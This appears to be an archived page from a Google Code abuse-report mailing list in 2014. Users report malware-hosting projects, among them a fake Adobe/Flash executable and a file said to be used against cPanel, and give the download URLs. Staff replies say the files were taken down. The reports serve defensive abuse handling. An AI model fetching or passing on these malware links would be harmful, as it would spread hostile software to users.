taken down, thanks On Tue, Feb 18, 2014 at 3:58 AM, Misha Shomz shom...@gmail.com wrote: http://netcat.googlecode.com/files/new.txt Used to hack into cPanel. -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group. To

Re: Malware

2014-02-18 Thread nitanovidiu
The link has been updated, now it is https://dont-download.googlecode.com/svn/trunk/AdobePremium.exe -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group. To unsubscribe from this group and stop receiving emails from it, send an

Malware

2014-02-16 Thread nitanovidiu
Hi, There is a malware Windows executable which comes from https://code.google.com/p/testingmyfiles/. The full URL is https://testingmyfiles.googlecode.com/svn/trunk/AdobePremium.exe The malware is linked from http://vidsvines.com/v/wtfvideos.htm and it seems that the main task is to spread

malware at c0d1.googlecode.com

2014-02-07 Thread J. Bennion
fake flash player malware used in iframe injection at chat.sylien.com is hosted at c0di.googlecode.com https://twitter.com/Techhelplistcom/status/431792166461898752 -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group

Re: malware at c0d1.googlecode.com

2014-02-07 Thread Augie Fackler
Taken down. On Fri, Feb 7, 2014 at 6:27 PM, J. Bennion bitsu...@gmail.com wrote: fake flash player malware used in iframe injection at chat.sylien.com is hosted at c0di.googlecode.com https://twitter.com/Techhelplistcom/status/431792166461898752 -- You received this message because you

  1   2   3   4   >